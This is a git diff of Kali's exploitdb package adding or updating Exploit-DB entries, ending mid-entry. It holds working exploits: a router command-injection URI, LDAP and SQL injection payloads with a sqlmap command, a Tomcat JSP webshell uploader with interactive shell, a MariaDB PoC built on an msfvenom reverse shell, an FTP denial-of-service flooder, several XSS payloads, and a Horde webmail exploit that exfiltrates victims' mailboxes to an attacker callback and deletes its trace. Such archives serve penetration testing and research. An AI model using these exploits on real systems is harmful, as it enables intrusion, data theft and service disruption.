diff --git a/debian/changelog b/debian/changelog
index b704d9b87..5761492bc 100644
--- a/debian/changelog
+++ b/debian/changelog
@@ -1,8 +1,9 @@
-exploitdb (20210413-0kali1) UNRELEASED; urgency=low
+exploitdb (20210417-0kali1) UNRELEASED; urgency=low
 
   * New upstream release.
+  * New upstream release.
 
- -- Kali Janitor <janitor@kali.org>  Tue, 13 Apr 2021 15:52:58 -0000
+ -- Kali Janitor <janitor@kali.org>  Sat, 17 Apr 2021 22:14:03 -0000
 
 exploitdb (20210410-0kali1) kali-dev; urgency=medium
 
diff --git a/exploits/hardware/webapps/49764.txt b/exploits/hardware/webapps/49764.txt
new file mode 100644
index 000000000..309422b7a
--- /dev/null
+++ b/exploits/hardware/webapps/49764.txt
@@ -0,0 +1,10 @@
+# Exploit Title: Genexis PLATINUM 4410 2.1 P4410-V2-1.28 - RCE
+# Date: 12-4-2021
+# Exploit Author: Jay Sharma 
+# Version: Genexis PLATINUM 4410 2.1 P4410-V2-1.28
+# Tested on: V2.1
+# CVE : CVE-2021-29003
+
+#steps to reproduce#
+
+Genexis PLATINUM 4410 2.1 P4410-V2-1.28 devices allow remote attackers to execute arbitrary code via shell metacharacters to sys_config_valid.xgi, as demonstrated by the http://x.x.x.x/sys_config_valid.xgi?exeshell=%60telnetd%20%26%60 URI
\ No newline at end of file
diff --git a/exploits/java/webapps/49762.txt b/exploits/java/webapps/49762.txt
new file mode 100644
index 000000000..196f7dea5
--- /dev/null
+++ b/exploits/java/webapps/49762.txt
@@ -0,0 +1,22 @@
+# Exploit Title: CITSmart ITSM 9.1.2.22 - LDAP Injection
+# Google Dork: "citsmart.local"
+# Date: 29/12/2020
+# Exploit Author: skysbsb
+# Vendor Homepage: https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html
+# Version: < 9.1.2.23
+# CVE : CVE-2020-35775
+
+To exploit this flaw it is necessary to have at least one user/password previously registered, because the system checks (ldap bind) the first user returned in the ldap search. However, it returns the last user found in the search to the function that called it (logic error).
+
+So, I call this problem an LDAP injection in conjunction with a programming logic error that allows you to authenticate to CITSmart ITSM with another valid user without needing to know the target user's password.
+
+Affected versions: < 9.1.2.23
+Fixed versions: >= 9.1.2.23
+
+Using this LDAP query in the username field of login page you could login with the target_username account without knowing the target account password.
+
+*)(|(sAMAccountName=valid_username)(sAMAccountName=target_username)
+
+You must know at least one username/password because the autenticacaoAD() function at LDAPUtils.java class (package br.com.centralit.citcorpore.integracao.ad) will try to bind with the first user (valid_username) of the query result.
+
+Vendor has acknowledge this vulnerability at ticket 5929 (https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html)
\ No newline at end of file
diff --git a/exploits/java/webapps/49763.txt b/exploits/java/webapps/49763.txt
new file mode 100644
index 000000000..79cd143df
--- /dev/null
+++ b/exploits/java/webapps/49763.txt
@@ -0,0 +1,21 @@
+# Exploit Title: CITSmart ITSM 9.1.2.27 - 'query' Time-based Blind SQL Injection (Authenticated)
+# Google Dork: "citsmart.local"
+# Date: 11/03/2021
+# Exploit Author: skysbsb
+# Vendor Homepage: https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html
+# Version: < 9.1.2.28
+# CVE : CVE-2021-28142
+
+To exploit this flaw it is necessary to be authenticated.
+
+URL vulnerable:
+https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale
+Param vulnerable: query
+
+Sqlmap usage:  sqlmap -u "
+https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale" --cookie 'JSESSIONID=xxx' --time-sec 1 --prefix "')" --suffix "AND ('abc%'='abc" --sql-shell
+
+Affected versions: < 9.1.2.28
+Fixed versions: >= 9.1.2.28
+
+Vendor has acknowledge this vulnerability at ticket 11216 (https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html)
\ No newline at end of file
diff --git a/exploits/jsp/webapps/42966.py b/exploits/jsp/webapps/42966.py
index 11d3e20e1..82d2eb1ff 100755
--- a/exploits/jsp/webapps/42966.py
+++ b/exploits/jsp/webapps/42966.py
@@ -4,13 +4,6 @@ import re
 import signal
 from optparse import OptionParser
 
-
-
-
-
-
-
-
 class bcolors:
     HEADER = '\033[95m'
     OKBLUE = '\033[94m'
@@ -22,8 +15,6 @@ class bcolors:
     UNDERLINE = '\033[4m'
 
 
-
-
 banner="""
 
 
@@ -41,9 +32,6 @@ banner="""
 """
 
 
-
-
-
 def signal_handler(signal, frame):
 
     print ("\033[91m"+"\n[-] Exiting"+"\033[0m")
@@ -71,7 +59,7 @@ def createPayload(url,f):
     headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
     req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers)
     if req.status_code==201:
-        print "File Created .."
+        print ("File Created ..")
 
    
 def RCE(url,f):
@@ -81,15 +69,15 @@ def RCE(url,f):
     </FORM>
     <%@ page import="java.io.*" %>
     <%
-   String cmd = request.getParameter("cmd");
-   String output = "";
-   if(cmd != null) {
-      String s = null;
-      try {
-         Process p = Runtime.getRuntime().exec(cmd,null,null);
-         BufferedReader sI = new BufferedReader(new
-InputStreamReader(p.getInputStream()));
-         while((s = sI.readLine()) != null) { output += s+"</br>"; }
+    String cmd = request.getParameter("cmd");
+    String output = "";
+    if(cmd != null) {
+        String s = null;
+        try {
+            Process p = Runtime.getRuntime().exec(cmd,null,null);
+            BufferedReader sI = new BufferedReader(new
+    InputStreamReader(p.getInputStream()));
+    while((s = sI.readLine()) != null) { output += s+"</br>"; }
       }  catch(IOException e) {   e.printStackTrace();   }
    }
 %>
@@ -107,7 +95,7 @@ def shell(url,f):
     
     while True:
         headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
-        cmd=raw_input("$ ")
+        cmd=input("$ ")
         payload={'cmd':cmd}
         if cmd=="q" or cmd=="Q":
                 break
@@ -115,7 +103,7 @@ def shell(url,f):
         re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers)
         re=str(re.content)
         t=removetags(re)
-        print t
+        print (t)
 
 
 
@@ -178,35 +166,35 @@ if opt.U==None and opt.P==None and opt.L==None:
 
 else:
     if opt.U!=None and opt.P==None and opt.L==None:
-        print bcolors.OKGREEN+banner+bcolors.ENDC 
-    	url=str(opt.U)
-    	checker="Poc.jsp"
-    	print bcolors.BOLD +"Poc Filename  {}".format(checker)
-    	createPayload(str(url)+"/",checker)
-    	con=getContent(str(url)+"/",checker)
-    	if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
-    		print bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC
-		print bcolors.WARNING+url+"/"+checker+bcolors.ENDC
-		
-	else:
-            print 'Not Vulnerable to CVE-2017-12617 '
+        print (bcolors.OKGREEN+banner+bcolors.ENDC)
+        url=str(opt.U)
+        checker="Poc.jsp"
+        print (bcolors.BOLD +"Poc Filename  {}".format(checker))
+        createPayload(str(url)+"/",checker)
+        con=getContent(str(url)+"/",checker)
+        if b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
+            print (bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC)
+            print (bcolors.WARNING+url+"/"+checker+bcolors.ENDC)
+    
+        else:
+            print ('Not Vulnerable to CVE-2017-12617 ')
     elif opt.P!=None and opt.U!=None and  opt.L==None:
-                print bcolors.OKGREEN+banner+bcolors.ENDC 
-		pwn=str(opt.P)
-		url=str(opt.U)
-		print "Uploading Webshell ....."
-		pwn=pwn+".jsp"
-		RCE(str(url)+"/",pwn)
-		shell(str(url),pwn)
+        print (bcolors.OKGREEN+banner+bcolors.ENDC)
+        pwn=str(opt.P)
+        url=str(opt.U)
+        print ("Uploading Webshell .....")
+        pwn=pwn+".jsp"
+        RCE(str(url)+"/",pwn)
+        shell(str(url),pwn)
     elif opt.L!=None and opt.P==None and opt.U==None:
-                print bcolors.OKGREEN+banner+bcolors.ENDC 
-		w=str(opt.L)
-		f=open(w,"r")
-		print "Scaning hosts in {}".format(w)
-		checker="Poc.jsp"
-		for i in f.readlines():
-			i=i.strip("\n")
-			createPayload(str(i)+"/",checker)
-			con=getContent(str(i)+"/",checker)
-			if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
-				print str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m"
\ No newline at end of file
+        print (bcolors.OKGREEN+banner+bcolors.ENDC)
+        w=str(opt.L)
+        f=open(w,"r")
+        print ("Scaning hosts in {}".format(w))
+        checker="Poc.jsp"
+        for i in f.readlines():
+            i=i.strip("\n")
+            createPayload(str(i)+"/",checker)
+            con=getContent(str(i)+"/",checker)
+            if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
+                print (str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m")
\ No newline at end of file
diff --git a/exploits/linux/local/49765.txt b/exploits/linux/local/49765.txt
new file mode 100644
index 000000000..393652170
--- /dev/null
+++ b/exploits/linux/local/49765.txt
@@ -0,0 +1,20 @@
+# Exploit Title: MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution
+# Date: 03/18/2021
+# Exploit Author: Central InfoSec
+# Version: MariaDB 10.2 before 10.2.37, 10.3 before 10.3.28, 10.4 before 10.4.18, and 10.5 before 10.5.9; Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL
+# Tested on: Linux
+# CVE : CVE-2021-27928
+
+# Proof of Concept:
+
+# Create the reverse shell payload
+msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf-so -o CVE-2021-27928.so
+
+# Start a listener
+nc -lvp <port>
+
+# Copy the payload to the target machine (In this example, SCP/SSH is used)
+scp CVE-2021-27928.so <user>@<ip>:/tmp/CVE-2021-27928.so
+
+# Execute the payload
+mysql -u <user> -p -h <ip> -e 'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";'
\ No newline at end of file
diff --git a/exploits/multiple/dos/49773.py b/exploits/multiple/dos/49773.py
new file mode 100755
index 000000000..fdc7cafbe
--- /dev/null
+++ b/exploits/multiple/dos/49773.py
@@ -0,0 +1,101 @@
+# Exploit Title: glFTPd 2.11a - Remote Denial of Service
+# Date: 15/05/2021
+# Exploit Author: xynmaps
+# Vendor Homepage: https://glftpd.io/
+# Software Link: https://glftpd.io/files/glftpd-LNX-2.11a_1.1.1k_x64.tgz
+# Version: 2.11a
+# Tested on: Parrot Security OS 5.9.0
+
+#-------------------------------#
+
+#encoding=utf8
+#__author__ = XYN/Dump/NSKB3
+#glFTPd Denial of Service exploit by XYN/Dump/NSKB3.
+"""
+glFTPd only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server,
+you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited.
+(if it's limited, just run this script from different proxies using proxychains, and it will work)
+"""
+
+import socket
+import sys
+import threading
+import subprocess
+import time
+
+banner = """
+._________________.
+|      glFTPd     |
+|       D o S     |
+|_________________|
+|By XYN/DUMP/NSKB3|
+|_|_____________|_|
+|_|_|_|_____|_|_|_|
+|_|_|_|_|_|_|_|_|_|
+
+"""
+usage = "{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0])
+
+def test(t,p):
+	s = socket.socket()
+	s.settimeout(10)
+	try:
+		s.connect((t, p))
+		response = s.recv(65535)
+		s.close()
+		return 0
+	except socket.error:
+		print("Port {} is not open, please specify a port that is open.".format(p))
+		sys.exit()
+def attack(targ, po, id):
+	try:
+		subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+		#print("Worker {} running".format(id))
+	except OSError: pass
+def main():
+	global target, port, start
+	print banner
+	try:
+		target = sys.argv[1]
+	except:
+		print usage
+		sys.exit()
+	try:
+		port = int(sys.argv[2])
+	except:
+		port = 21
+	try:
+		conns = int(sys.argv[3])
+	except:
+		conns = 50
+	print("[!] Testing if {0}:{1} is open".format(target, port))
+	test(target, port)
+	print("[+] Port {} open, starting attack...".format(port))
+	time.sleep(2)
+	print("[+] Attack started on {0}:{1}!".format(target, port))
+	def loop(target, port, conns):
+		global start
+		threading.Thread(target=timer).start()
+		while 1:
+			for i in range(1, conns + 3):
+				t = threading.Thread(target=attack, args=(target,port,i,))
+				t.start()
+				if i > conns + 2:
+					t.join()
+					break
+					loop()
+
+	t = threading.Thread(target=loop, args=(target, port, conns,))
+	t.start()
+
+def timer():
+        start = time.time()
+        while 1:
+                if start < time.time() + float(900): pass
+                else:
+                        subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+                        t = threading.Thread(target=loop, args=(target, port,))
+			t.start()
+                        break
+
+main()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49759.txt b/exploits/multiple/webapps/49759.txt
new file mode 100644
index 000000000..adbf41a91
--- /dev/null
+++ b/exploits/multiple/webapps/49759.txt
@@ -0,0 +1,23 @@
+# Exploit Title: Blitar Tourism 1.0 - Authentication Bypass SQLi
+# Date: 13 April 2021
+# Exploit Author: sigeri94
+# Vendor Homepage: https://sourcecodeaplikasi.info/source-code-aplikasi-biro-travel-berbasis-web/
+# Software Link: https://codeload.github.com/satndy/Aplikasi-Biro-Travel/zip/master
+# Version: 1.0
+
+POST /travel/Admin/ HTTP/1.1
+Host: 192.168.186.132
+Content-Length: 49
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://192.168.186.132
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://192.168.186.132/travel/Admin/
+Accept-Encoding: gzip, deflate
+Accept-Language: id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: PHPSESSID=0nr18qfifjk2f5o4kimk5ca312
+Connection: close
+
+username=admin%27+%23&password=admin&Login=Log+in
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49760.txt b/exploits/multiple/webapps/49760.txt
new file mode 100644
index 000000000..a6f701e27
--- /dev/null
+++ b/exploits/multiple/webapps/49760.txt
@@ -0,0 +1,41 @@
+# Exploit Title: ExpressVPN VPN Router 1.0 - Router Login Panel's Integer Overflow
+# Date: 09-04-2021
+# Exploit Author: Jai Kumar Sharma
+# Vendor Homepage: https://www.expressvpn.com/
+# Software Link: https://www.expressvpn.com/vpn-software/vpn-router
+# Version: version 1
+# Tested on: Windows/Ubuntu/MacOS
+# CVE : CVE-2020-29238
+
+*Proof of concept*:
+
+ExpressVPN Router's Login Panel runs on Nginx webserver, the version v1 of the router's firmware hosts web login panel on vulnerable web server
+
+ExpressVPN Summary: A publicly known bug in the Nginx server used by the ExpressVPN Router version 1.x firmware was reported. ExpressVPN no longer ships or supports that version and all users are encouraged to upgrade to the latest version of the ExpressVPN Router firmware available on our site, which is not vulnerable to this bug. Additionally, we highly discourage our users from exposing their router control panel to the Internet, as this class of bug would only be exploitable with access to the control panel, which is usually restricted to the local network. For help or support upgrading your router please visit: https://www.expressvpn.com/support/
+
+ExpressVPN Router version 1 is vulnerable to integer overflow vulnerability in Nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.
+
+Crafted Request:
+GET / HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0)
+Gecko/20100101 Firefox/81.0
+Host: 127.0.0.1:8181
+Accept-Encoding: identity
+Range: bytes=-17208,-9223372036854758999
+Connection: close
+
+
+Response:
+HTTP/1.1 206 Partial Content
+Server: nginx/1.9.15
+Date: Tue, 10 Nov 2020 19:22:05 GMT
+Content-Type: multipart/byteranges; boundary=00000000002
+Content-Length: 598
+Last-Modified: Thu, 13 Sep 2018 04:55:28 GMT
+Connection: close
+ETag: "5b99edc0-99f"
+
+
+--00000000002
+Content-Type: text/html
+Content-Range: bytes -14745-2462/2463
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49766.txt b/exploits/multiple/webapps/49766.txt
new file mode 100644
index 000000000..6787563bb
--- /dev/null
+++ b/exploits/multiple/webapps/49766.txt
@@ -0,0 +1,8 @@
+# Exploit Title: jQuery 1.2 - Cross-Site Scripting (XSS)
+# Date: 04/29/2020
+# Exploit Author: Central InfoSec
+# Version: jQuery versions greater than or equal to 1.2 and before 3.5.0
+# CVE : CVE-2020-11022
+
+# Proof of Concept 1:
+<option><style></option></select><img src=x onerror=alert(1)></style>
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49767.txt b/exploits/multiple/webapps/49767.txt
new file mode 100644
index 000000000..ec9f80730
--- /dev/null
+++ b/exploits/multiple/webapps/49767.txt
@@ -0,0 +1,11 @@
+# Exploit Title: jQuery 1.0.3 - Cross-Site Scripting (XSS)
+# Date: 04/29/2020
+# Exploit Author: Central InfoSec
+# Version: jQuery versions greater than or equal to 1.0.3 and before 3.5.0
+# CVE : CVE-2020-11023
+
+# Proof of Concept 1:
+<style><style /><img src=x onerror=alert(1)>
+
+# Proof of Concept 2 (Only jQuery 3.x affected):
+<img alt="<x" title="/><img src=x onerror=alert(1)>">
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49769.py b/exploits/multiple/webapps/49769.py
new file mode 100755
index 000000000..3aaeec7e0
--- /dev/null
+++ b/exploits/multiple/webapps/49769.py
@@ -0,0 +1,283 @@
+# Exploit Title: Horde Groupware Webmail 5.2.22 - Stored XSS
+# Author: Alex Birnberg
+# Testing and Debugging: Ventsislav Varbanovski @nu11secur1ty
+# Date: 04.14.2021
+# Vendor: https://www.horde.org/apps/webmail
+# Link: https://github.com/horde/webmail/releases
+# CVE: CVE-2021-26929
+
+[+] Exploit Source:
+https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-26929
+
+[Exploit Program Code]
+
+#!/usr/bin/python3
+# Author idea: Alex Birnberg
+# debug nu11secur1ty 2021
+import io
+import os
+import ssl
+import sys
+import json
+import base64
+import string
+import random
+import logging
+import smtplib
+import sqlite3
+import hashlib
+import zipfile
+import argparse
+from flask import Flask, request, Response
+from urllib.parse import urlparse
+
+class Exploit:
+    def __init__(self, args):
+        # Database
+        if not os.path.exists('database.db'):
+            with sqlite3.connect("database.db") as conn:
+                cursor = conn.cursor()
+                cursor.execute('CREATE TABLE mailbox (hash TEXT NOT NULL UNIQUE, content BLOB NOT NULL);')
+                conn.commit()
+        # SMTP URL
+        o = urlparse(args.smtp)
+        self.smtp = {
+            'ssl': o.scheme.lower() == 'smtps',
+            'host': o.hostname or '127.0.0.1',
+            'port': o.port or ('465' if o.scheme.lower() == 'smtps' else '25'),
+            'username': '' or o.username,
+            'password': '' or o.password
+        }
+        try:
+            if self.smtp['ssl']:
+                context = ssl.create_default_context()
+                context.verify_mode = ssl.CERT_OPTIONAL 
+                context.check_hostname = False
+                self.server = smtplib.SMTP_SSL(self.smtp['host'], self.smtp['port'], context=context)
+            else:
+                self.server = smtplib.SMTP(self.smtp['host'], self.smtp['port'])
+        except Exception as e:
+            print(e)
+            print('[-] Error connecting to SMTP server!')
+            exit()
+        try:
+            self.server.login(self.smtp['username'], self.smtp['password'])
+        except:
+            pass
+        # Callback URL
+        o = urlparse(args.callback)
+        self.callback = {
+            'url': '{}://{}'.format(o.scheme, o.netloc),
+            'path': ''.join(random.choice(string.ascii_letters) for i in range(20))
+        }
+        # Listener URL
+        o = urlparse(args.listener)
+        self.listener = {
+            'ssl': o.scheme.lower() == 'https',
+            'host': o.hostname or '0.0.0.0',
+            'port': o.port or 80,
+            'horde': ''.join(random.choice(string.ascii_letters) for i in range(20))
+        }
+        # Target email
+        self.target = args.target
+        # Subject
+        self.subject = args.subject or 'Important Message'
+        # Environment
+        self.env = {}
+        self.env['mailbox'] = args.mailbox or 'INBOX'
+        self.env['callback'] = '{}/{}'.format(self.callback['url'], self.callback['path'])
+    
+    def trigger(self):
+        print('[*] Waiting for emails...')
+        self.bypass_auth()        
+        print('\n[*] Done')
+
+    def bypass_auth(self):
+        def horde():
+            f = open('horde.js')
+            content = 'env = {};\n\n{}'.format(json.dumps(self.env), f.read())
+            f.close()
+            return content
+
+        def callback():
+            response = Response('')
+            with sqlite3.connect("database.db") as conn:
+                try:
+                    if request.files.get('mbox'):
+                        filename = request.files.get('mbox').filename.replace('zip', 'mbox')
+                        content = request.files.get('mbox').stream.read()
+                        zipdata = io.BytesIO()
+                        zipdata.write(content)
+                        content = zipfile.ZipFile(zipdata)
+                        content = content.open(filename).read()
+                        mail_hash =  hashlib.sha1(content).digest().hex()
+                        print('[+] Received mailbox ({})'.format(mail_hash))                        
+                        cursor = conn.cursor()                    
+                        cursor.execute('INSERT INTO mailbox (hash, content) VALUES (?, ?)', (mail_hash, content))
+                except:
+                    pass
+            response.headers['Access-Control-Allow-Origin'] = '*'
+            return response
+
+        payload = 'var s=document.createElement("script");s.type="text/javascript";s.src="{}/{}";document.head.append(s);'.format(self.callback['url'], self.listener['horde'])
+        payload = '<script>eval(atob("{}"))</script>'.format(base64.b64encode(payload.encode('latin-1')).decode('latin-1'))
+        content = 'Subject: {}\nFrom: {}\nTo: {}\n'.format(self.subject, self.smtp['username'], self.target)
+        # The secret services :)
+        content += 'X\x00\x00\x00{}\x00\x00\x00X'.format(base64.b64encode(payload.encode('latin-1')).decode('latin-1'))
+        self.server.sendmail(self.smtp['username'], self.target, content)
+        app = Flask(__name__)
+        app.add_url_rule('/{}'.format(self.listener['horde']), 'horde', horde)
+        app.add_url_rule('/{}'.format(self.callback['path']), 'callback', callback, methods=['POST'])
+        logging.getLogger('werkzeug').setLevel(logging.ERROR)
+        cli = sys.modules['flask.cli']
+        cli.show_server_banner = lambda *x: None
+        try:
+            if self.listener['ssl']:
+                app.run(host=self.listener['host'], port=self.listener['port'], ssl_context=('cert.pem', 'key.pem'))
+            else:
+                app.run(host=self.listener['host'], port=self.listener['port'])
+        except:
+            pass
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser()
+    parser.add_argument('--smtp', help='SMTP URL', required=True, metavar='URL')
+    parser.add_argument('--callback', help='Callback URL', required=True, metavar='URL')
+    parser.add_argument('--listener', help='Listener URL', metavar='URL')
+    parser.add_argument('--target', help='Target email', required=True, metavar='EMAIL')
+    parser.add_argument('--subject', help='Email subject', metavar='SUBJECT')
+    parser.add_argument('--mailbox', help='Mailbox from which to steal the emails', metavar='INBOX')
+    args = parser.parse_args()
+    exploit = Exploit(args)
+    exploit.trigger()
+horde.js
+
+class Exploit {
+    constructor() {
+        this.basepath = document.location.pathname.substring(0, document.location.pathname.indexOf('imp'));
+    }
+
+    trigger() {
+        this.mailbox = this.get_mailbox();
+        this.buid = this.get_buid();
+        this.token = this.get_token();
+        this.auto_delete()
+        .then(() => {
+            this.exfiltrate_emails({mailbox: env.mailbox});
+        });
+    }
+
+    async auto_delete() {
+        let params = new URLSearchParams()
+        params.append('token', this.token);
+        params.append('view', this.mailbox);
+        params.append('buid', this.buid);
+        return fetch(this.basepath + 'services/ajax.php/imp/deleteMessages', {
+            method: 'POST',
+            body: params
+        })
+        .then(() => {
+            let params = new URLSearchParams();
+            params.append('token', this.token);
+            params.append('view', this.mailbox);
+            return fetch(this.basepath + 'services/ajax.php/imp/purgeDeleted', {
+                method: 'POST',
+                body: params
+            })
+            .then(() => {
+                if (document.getElementById('checkmaillink') !== null) {
+                    document.getElementById('checkmaillink').click();
+                }
+            });
+        });
+    }
+
+    async exfiltrate_emails(args) {
+        let mbox_list = '["' + this.get_mailbox() + '"]';
+        if (args.mailbox.toUpperCase() != 'INBOX') {
+            let params = new URLSearchParams();
+            params.append('reload', '1');
+            params.append('unsub', '1');
+            params.append('token', this.token);
+            let mailboxes = await fetch(this.basepath + 'services/ajax.php/imp/listMailboxes', {
+                method: 'POST',
+                body: params
+            })
+            .then(response => {
+                return response.text();
+            })
+            .then(data => {
+                return JSON.parse(data.substring(10, data.length - 2));       
+            });
+            mailboxes.tasks['imp:mailbox'].a.forEach(mailbox => {
+                if (mailbox.l.toUpperCase() == args.mailbox) {
+                    if (mbox_list === undefined) {
+                        mbox_list = '["' + mailbox.m + '"]';
+                    }
+                }
+            });
+        }
+        let zip = await fetch(this.basepath + 'services/download/?app=imp&actionID=download_mbox&mbox_list=' + mbox_list + '&type=mboxzip&token=' + this.token + '&fn=/')
+        .then(response => {
+            return [response.blob(), response.headers.get('Content-Disposition')];
+        });
+        let filename = zip[1];
+        filename = filename.substring(filename.indexOf('filename="') + 10, filename.length - 1);
+        zip = await zip[0];
+        let formData = new FormData();
+        formData.append('mbox', zip, filename);
+        fetch(window.env.callback, {
+            method: 'POST',
+            body: formData
+        });
+    }
+
+    get_token() {
+        let link;
+        let token;
+        if (document.getElementsByClassName('smartmobile-logout').length > 0) {
+            link = document.getElementsByClassName('smartmobile-logout')[0].href;
+        }
+        else if (document.getElementById('horde-logout') !== null) {
+            link = document.getElementById('horde-logout').getElementsByTagName('a')[0].href;
+        }
+        else {
+            link = location.href;
+        }
+        if (link.match('horde_logout_token=(.*)&') !== null) {
+            token = link.match('horde_logout_token=(.*)&')[1];
+        }
+        if (token === undefined && link.match('token=(.*)&') !== null) {
+            token = link.match('token=(.*)&')[1];
+        }
+        return token;
+    }
+
+    get_mailbox() {
+        if (window.DimpBase !== undefined) {
+            return DimpBase.viewport.getSelection(DimpBase.pp.VP_view).search({
+                VP_id: {
+                    equal: [ DimpBase.pp.VP_id ]
+                }
+            }).get('dataob').first().VP_view;
+        }
+        else if (location.href.match('mailbox=([A-Za-z0-9]*)') !== null) {
+            return location.href.match('mailbox=([A-Za-z0-9]*)')[1];
+        }
+        else if (location.href.match('mbox=([A-Za-z0-9]*)') !== null) {
+            return location.href.match('mbox=([A-Za-z0-9]*)')[1];
+        }
+    }
+
+    get_buid() {
+        if (location.href.match('buid=([0-9]*)') !== null) {
+            return location.href.match('buid=([0-9]*)')[1];
+        }
+        else if (location.href.match(';([0-9]*)') !== null) {
+            return location.href.match(';([0-9]*)')[1];
+        }
+    }
+}
+
+const exploit = new Exploit();
+exploit.trigger();
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49771.txt b/exploits/multiple/webapps/49771.txt
new file mode 100644
index 000000000..f6092e1bd
--- /dev/null
+++ b/exploits/multiple/webapps/49771.txt
@@ -0,0 +1,10 @@
+# Exploit Title: Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS)
+# Date: 15/04/2021
+# Exploit Author: Akash Chathoth
+# Vendor Homepage: http://tileserver.org/
+# Software Link: https://github.com/maptiler/tileserver-gl
+# Version: versions <3.1.0
+# Tested on: 2.6.0
+# CVE: 2020-15500
+
+Exploit : http://example.com/?key="><script>alert(document.domain)</script>
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49772.py b/exploits/multiple/webapps/49772.py
new file mode 100755
index 000000000..d02332c79
--- /dev/null
+++ b/exploits/multiple/webapps/49772.py
@@ -0,0 +1,58 @@
+# Exploit Title: htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS)
+# Authors: @nu11secur1ty & G.Dzhankushev
+# Date: 04.15.2021
+# Vendor Homepage: https://www.htmly.com/
+# Software Link: https://github.com/danpros/htmly
+# CVE: CVE-2021-30637
+
+#!/usr/bin/python3
+
+from selenium import webdriver
+from selenium.webdriver.common.by import By
+from selenium.webdriver.support.ui import WebDriverWait
+from selenium.webdriver.support import expected_conditions as EC
+import time
+
+
+#enter the link to the website you want to automate login.
+website_link="http://localhost/htmly/login"
+
+#enter your login username
+username="nu11secur1ty"
+
+#enter your login password
+password="password"
+
+#enter the element for username input field
+element_for_username="user"
+#enter the element for password input field
+element_for_password="password"
+#enter the element for submit button
+element_for_submit="submit"
+
+
+#browser = webdriver.Safari()	#for macOS users[for others use chrome vis chromedriver]
+browser = webdriver.Chrome()	#uncomment this line,for chrome users
+#browser = webdriver.Firefox()	#uncomment this line,for chrome users
+
+browser.get((website_link))	
+
+try:
+	username_element = browser.find_element_by_name(element_for_username)
+	username_element.send_keys(username)		
+	password_element  = browser.find_element_by_name(element_for_password)
+	password_element.send_keys(password)
+	signInButton = browser.find_element_by_name(element_for_submit)
+	signInButton.click()
+	
+	# Exploit .ini
+	browser.get(("http://localhost/htmly/admin/config"))	
+	browser.execute_script("document.querySelector('[name=\"-config-blog.description\"]').innerText = '</span><img src=1 onerror=alert(1) /><span>'") 
+	time.sleep(3)
+	browser.execute_script("document.querySelector('.btn.btn-primary').click()")
+
+	print("payload is deployed...\n")
+	
+except Exception:
+	#### This exception occurs if the element are not found in the webpage.
+	print("Some error occured :(")
\ No newline at end of file
diff --git a/exploits/php/webapps/49758.txt b/exploits/php/webapps/49758.txt
new file mode 100644
index 000000000..cdfb84a25
--- /dev/null
+++ b/exploits/php/webapps/49758.txt
@@ -0,0 +1,33 @@
+# Exploit Title: Simple Student Information System 1.0 - SQL Injection (Authentication Bypass)
+# Date: 13 April 2021
+# Exploit Author: Galuh Muhammad Iman Akbar (GaluhID)
+# Vendor Homepage: https://www.sourcecodester.com/php/11400/simple-student-information-system-ajax-live-search.html
